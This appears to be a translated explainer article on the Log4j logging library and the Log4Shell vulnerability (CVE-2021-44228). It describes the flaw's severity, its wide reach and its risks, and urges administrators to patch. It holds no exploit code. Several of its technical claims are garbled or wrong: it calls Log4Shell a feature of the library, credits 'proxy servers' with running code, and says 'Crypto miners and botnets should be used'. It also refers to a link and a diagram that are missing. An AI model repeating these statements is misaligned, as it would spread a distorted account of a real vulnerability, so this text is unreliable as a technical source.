What is Log4j?
Log4j is a popular and widely used Java logging library. This open source library is provided by the Apache Foundation and provides system users with common system errors and operations and their associated diagnostic messages. A common example of Log4j is when you click on the wrong link or enter something wrong in the address bar and get a 404 message. The web server tells you that no such page exists. This event is recorded in a log or report by log4j for web server operating systems.
Log4Shell vulnerability with number CVE-2021-44228
Log4shell is a feature of the Log4j library that allows users to customize log message formatting, this feature also allows Log4j to log the username associated with each server login attempt. The degree of this vulnerability (CVSS) according to the published information is 10 and its publication date is 12/10/2021.
Unfortunately, this type of code can be used for more than formatting log messages. Log4j allows proxy servers to execute software code that can perform any action on the target computer. This opens the door for nefarious activities such as stealing sensitive information, taking control of the target system, and sending malware to other users connected to the compromised server.
One of the main concerns about Log4Shell is Log4j’s place in the software ecosystem. Logging is one of the basic features of most software. This library is used in cloud services such as Apple iCloud and Amazon Web Services, as well as a wide range of software development and security applications and tools.
Due to the widespread use of this library in most Java-based products, many of these products are expected to be vulnerable. The number of such services is very large and this issue causes very critical problems. Using the following link, you can see the servers that are vulnerable to log4shell:
The diagram below shows the vulnerability of international infrastructures to this vulnerability.
Risks of Log4shell vulnerability
By exploiting this vulnerability, an intruder can have access to execute arbitrary code on the vulnerable server. Due to the ease of abuse of this security problem, it is predicted that this vulnerability will spread in many ransomwares. Crypto miners and botnets should be used.
Depending on how this library is used in the system, its modification requires different solutions and there is no single solution to fix this vulnerability. However, managers and relevant officials are strongly advised to make sure that their servers are not vulnerable, and if they are vulnerable, they should update or patch their servers as quickly as possible.